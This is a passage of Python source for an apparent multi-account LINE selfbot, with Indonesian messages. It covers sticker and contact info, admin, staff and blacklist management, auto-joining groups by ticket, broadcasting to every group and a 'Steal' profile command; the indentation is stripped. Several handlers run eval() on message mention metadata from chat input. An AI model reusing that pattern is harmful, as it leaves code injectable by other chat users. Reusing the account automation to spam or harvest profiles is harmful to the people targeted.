ret_ += "\n• Sticker Url : line://shop/detail/{}".format(pkg_id)
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
if wait["stickerOn"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://store.line.me/stickershop/product/{}/id".format(urllib.parse.quote(pkg_id)))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.select("[class~=mdBtn01Txt]")[0].text
if data == 'Lihat Produk Lain':
ret_ = "「 Sticker Info 」"
ret_ += "\n• STICKER ID : {}".format(stk_id)
ret_ += "\n• STICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\n• STICKER VERSION : {}".format(stk_ver)
ret_ += "\n• STICKER URL : line://shop/detail/{}".format(pkg_id)
cl.sendMessage(msg.to, str(ret_))
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
cl.sendImage(msg.to,path)
else:
ret_ = "「 Sticker Info 」"
ret_ += "\n• PRICE : "+soup.findAll('p', attrs={'class':'mdCMN08Price'})[0].text
ret_ += "\n• AUTHOR : "+soup.select("a[href*=/stickershop/author]")[0].text
ret_ += "\n• STICKER ID : {}".format(str(stk_id))
ret_ += "\n• STICKER PACKAGES ID : {}".format(str(pkg_id))
ret_ += "\n• STICKER VERSION : {}".format(str(stk_ver))
ret_ += "\n• STICKER URL : line://shop/detail/{}".format(str(pkg_id))
ret_ += "\n• DESCRIPTION :\n"+soup.findAll('p', attrs={'class':'mdCMN08Desc'})[0].text
cl.sendMessage(msg.to, str(ret_))
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
cl.sendImage(msg.to,path)
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to," 「 Contact Info 」\n「✭」 Nama : " + msg.contentMetadata["displayName"] + "\n「✭」 MID : " + msg.contentMetadata["mid"] + "\n「✭」 Status Msg : " + contact.statusMessage + "\n「✭」 Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if msg.contentType == 13:
if msg._from in admin:
if wait["invite"] == True:
msg.contentType = 0
contact = cl.getContact(msg.contentMetadata["mid"])
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if invite in wait["blacklist"]:
cl.sendMessage(msg.to, "「Dia ke bl kak... hpus bl dulu lalu invite lagi」")
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
ryan = cl.getContact(target)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Sukses Invite 」\nNama "
ret_ = "「Ketik Invite off jika sudah done」"
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(msg.to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
wait["invite"] = False
break
except:
cl.sendText(msg.to,"Anda terkena limit")
wait["invite"] = False
break
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot saints")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if wait["Addimage"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
images[wait["Addimage"]["name"]] = str(path)
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan gambar {}".format(str(wait["Addimage"]["name"])))
wait["Addimage"]["status"] = False
wait["Addimage"]["name"] = ""
if msg.contentType == 2:
if msg._from in admin:
if wait["Addvideo"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
videos[wait["Addvideo"]["name"]] = str(path)
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan video {}".format(str(wait["Addvideo"]["name"])))
wait["Addvideo"]["status"] = False
wait["Addvideo"]["name"] = ""
if msg.contentType == 7:
if msg._from in admin:
if wait["Addsticker"]["status"] == True:
stickers[wait["Addsticker"]["name"]] = {"STKID":msg.contentMetadata["STKID"],"STKPKGID":msg.contentMetadata["STKPKGID"]}
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan sticker {}".format(str(wait["Addsticker"]["name"])))
wait["Addsticker"]["status"] = False
wait["Addsticker"]["name"] = ""
if msg.contentType == 3:
if msg._from in admin:
if wait["Addaudio"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
audios[wait["Addaudio"]["name"]] = str(path)
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan mp3 {}".format(str(wait["Addaudio"]["name"])))
wait["Addaudio"]["status"] = False
wait["Addaudio"]["name"] = ""
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["foto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["foto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 2:
if msg._from in admin:
if mid in Setmain["video"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["video"][mid]
cl.updateProfileVideoPicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah jadi video")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["foto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["foto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["foto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["foto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["foto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["foto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Dmid in Setmain["foto"]:
path = km.downloadObjectMsg(msg_id)
del Setmain["foto"][Dmid]
km.updateProfilePicture(path)
km.sendMessage(msg.to,"Foto berhasil dirubah")
elif Emid in Setmain["foto"]:
path = kb.downloadObjectMsg(msg_id)
del Setmain["foto"][Emid]
kb.updateProfilePicture(path)
kb.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["foto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["foto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
path4 = km.downloadObjectMsg(msg_id)
path5 = kb.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
km.updateProfilePicture(path4)
km.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kb.updateProfilePicture(path5)
kb.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
for sticker in stickers:
if msg._from in admin:
if text.lower() == sticker:
sid = stickers[text.lower()]["STKID"]
spkg = stickers[text.lower()]["STKPKGID"]
cl.sendSticker(to, spkg, sid)
for image in images:
if msg._from in admin:
if text.lower() == image:
cl.sendImage(msg.to, images[image])
for audio in audios:
if msg._from in admin:
if text.lower() == audio:
cl.sendAudio(msg.to, audios[audio])
for video in videos:
if msg._from in admin:
if text.lower() == video:
cl.sendVideo(msg.to, videos[video])
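                        # Prefixed text commands are dispatched from here on; command()
                        # lowercases the text and strips the key prefix before the checks below.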
cmd = command(text)
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help1":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Selfbot Command 」\n• User : "
ret_ = str(helpMessage)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Setting Blacklist 」\n• User : "
ret_ = str(helpMessage1)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "setting":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "\n「Settings List Protection」\n"
if wait["mentionKick"] == True: md+="「✭」 Notag「ON」\n"
else: md+="「✭」 Notag「OFF」\n"
if wait["stickerOn"] == True: md+="「✭」 Sticker「ON」\n"
else: md+="「✭」 Sticker「OFF」\n"
if wait["contact"] == True: md+="「✭」 Contact「ON」\n"
else: md+="「✭」 Contact「OFF」\n"
if wait["talkban"] == True: md+="「✭」 Talkban「ON」\n"
else: md+="「✭」 Talkban「OFF」\n"
if wait["unsend"] == True: md+="「✭」 Unsend「ON」\n"
else: md+="「✭」 Unsend「OFF」\n"
if wait["detectMention"] == True: md+="「✭」 Respon「ON」\n"
else: md+="「✭」 Respon「OFF」\n"
if wait["Timeline"] == True: md+="「✭」 Timeline「ON」\n"
else: md+="「✭」 Timeline「OFF」\n"
if wait["autoJoin"] == True: md+="「✭」 Autojoin「ON」\n"
else: md+="「✭」 Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="「✭」 Autoadd「ON」\n"
else: md+="「✭」 Autoadd「OFF」\n"
if settings["autoJoinTicket"] == True: md+="「✭」 Jointicket「ON」\n"
else: md+="「✭」 Jointicket「OFF」\n"
if msg.to in welcome: md+="「✭」 Welcome「ON」\n"
else: md+="「✭」 Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="「✭」 Autoleave「ON」\n"
else: md+="「✭」 Autoleave「OFF」\n"
if msg.to in protectqr: md+="「✭」 Protecturl「ON」\n"
else: md+="「✭」 Protecturl「OFF」\n"
if msg.to in protectjoin: md+="「✭」 Protectjoin「ON」\n"
else: md+="「✭」 Protectjoin「OFF」\n"
if msg.to in protectkick: md+="「✭」 Protectkick「ON」\n"
else: md+="「✭」 Protectkick「OFF」\n"
if msg.to in protectinvite: md+="「✭」 Protectinvite「ON」\n"
else: md+="「✭」 Protectinvite「OFF」\n"
if msg.to in protectcancel: md+="「✭」 Protectcancel「ON」\n"
else: md+="「✭」 Protectcancel「OFF」\n"
if msg.to in protectantijs: md+="=Antijs [ON]\n"
else: md+="=Antijs [OFF]\n"
if msg.to in ghost: md+="=Ghost [ON]\n"
else: md+="=Ghost [OFF]\n"
ginfo = cl.getGroup(msg.to)
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Selfbot Settings 」\n• User : "
ret_ = "• Group : {}\n".format(str(ginfo.name))
ret_ += str(md)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + "\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"「Created by : Oz.♋️ 」")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd.startswith('about'):
if wait["selfbot"] == True:
if msg._from in admin:
try:
arr = []
today = datetime.today()
thn = 2025
bln = 12 # fill in the rental expiry month
hr = 11 # fill in the rental expiry day
future = datetime(thn, bln, hr)
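# str(future - today) looks like "123 days, 4:56:07.000000"; slicing at the first comma keeps
# only the day count for the expiry countdown shown in the "about" reply.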
days = (str(future - today))
comma = days.find(",")
days = days[:comma]
contact = cl.getContact(mid)
favoritelist = cl.getFavoriteMids()
grouplist = cl.getGroupIdsJoined()
contactlist = cl.getAllContactIds()
blockedlist = cl.getBlockedContactIds()
eltime = time.time() - mulai
bot = runtime(eltime)
start = time.time()
sw.sendText("ue6d8f9ef8f820fad9c65bbb5d1ec714b", '.')
elapsed_time = time.time() - start
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Informasi Selfbot 」\n• User : "
ret_ = "• Group : {} Group".format(str(len(grouplist)))
ret_ += "\n• Friend : {} Friend".format(str(len(contactlist)))
ret_ += "\n• Blocked : {} Blocked".format(str(len(blockedlist)))
ret_ += "\n• Favorite : {} Favorite".format(str(len(favoritelist)))
ret_ += "\n• Version : 「Self Bots 」"
ret_ += "\n• Expired : {} - {} - {}".format(str(hr), str(bln), str(thn))
ret_ += "\n• In days : {} again".format(days)
ret_ += "\n「 Speed Respon 」\n• {} detik".format(str(elapsed_time))
ret_ += "\n「 Selfbot Runtime 」\n• {}".format(str(bot))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
cl.sendContact(to, "ue6d8f9ef8f820fad9c65bbb5d1ec714b")
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 User Selfbot 」\n", "")
cl.sendContact(msg.to,sender)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif cmd.startswith("mid "):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Steal " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
a = channel.getProfileCoverURL(mid=key1)
cl.sendMessage(msg.to, "「 Contact Info 」\n• Nama : "+str(mi.displayName)+"\n• Mid : " +key1+"\n• Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
cl.sendImageWithURL(receiver, a)
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
cl.sendImageWithURL(receiver, a)
elif ("Cover " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
try:
key = eval(msg.contentMetadata["MENTION"])
u = key["MENTIONEES"][0]["M"]
a = channel.getProfileCoverURL(mid=u)
cl.sendImageWithURL(receiver, a)
except Exception as e:
cl.sendText(receiver, str(e))
elif ("Sticker: " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
try:
query = msg.text.replace("Sticker: ", "")
query = int(query)
if type(query) == int:
cl.sendImageWithURL(receiver, 'https://stickershop.line-scdn.net/stickershop/v1/product/'+str(query)+'/ANDROID/main.png')
cl.sendText(receiver, 'https://line.me/S/sticker/'+str(query))
else:
cl.sendText(receiver, 'gunakan key sticker angka bukan huruf')
except Exception as e:
cl.sendText(receiver, str(e))
elif "/ti/g/" in msg.text.lower():
if msg._from in admin:
if settings["autoJoinTicket"] == True:
link_re = re.compile(r'(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group4 = km.findGroupByTicket(ticket_id)
km.acceptGroupInvitationByTicket(group4.id,ticket_id)
km.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group5 = kb.findGroupByTicket(ticket_id)
kb.acceptGroupInvitationByTicket(group5.id,ticket_id)
kb.sendMessage(msg.to, "Masuk : %s" % str(group.name))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif cmd == "reject":
if wait["selfbot"] == True:
if msg._from in admin:
ginvited = cl.getGroupIdsInvited()
if ginvited != [] and ginvited != None:
for gid in ginvited:
cl.rejectGroupInvitation(gid)
cl.sendMessage(to, "Berhasil tolak sebanyak {} undangan grup".format(str(len(ginvited))))
else:
cl.sendMessage(to, "Tidak ada undangan yang tertunda")
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
km.removeAllMessages(op.param2)
kb.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if msg._from in admin:
sep = text.split(" ")
bc = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Broadcast 」\nBroadcast by "
ret_ = "{}".format(str(bc))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(group, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Setkey 」\nSetkey saat ini「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「 Change Setkey 」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「 Resetkey 」\nSetkey mu telah direset")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Restarting 」\nUser ", "\nTunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = runtime(eltime)
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Runtime 」\n• User Self : "
ret_ = "• {}".format(str(bot))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
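# G.createdTime is an epoch timestamp in milliseconds, hence the division by 1000 before time.localtime().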
cl.sendMessage(msg.to, "「 Group Info 」\n「✭」 Nama Group : {}".format(G.name)+ "\n「✭」 ID Group : {}".format(G.id)+ "\n「✭」 Pembuat : {}".format(G.creator.displayName)+ "\n「✭」 Waktu Dibuat : {}".format(str(timeCreated))+ "\n「✭」 Jumlah Member : {}".format(str(len(G.members)))+ "\n「✭」 Jumlah Pending : {}".format(gPending)+ "\n「✭」 Group Qr : {}".format(gQr)+ "\n「✭」 Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
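# The commands below address a group by its 1-based index in cl.getGroupIdsJoined()
# (the same ordering shown by gruplist) instead of by group name.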
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "「 Group Info 」"
ret_ += "\n「✭」 Nama Group : {}".format(G.name)
ret_ += "\n「✭」 ID Group : {}".format(G.id)
ret_ += "\n「✭」 Pembuat : {}".format(gCreator)
ret_ += "\n「✭」 Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n「✭」 Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n「✭」 Jumlah Pending : {}".format(gPending)
ret_ += "\n「✭」 Group Qr : {}".format(gQr)
ret_ += "\n「✭」 Group Ticket : {}".format(gTicket)
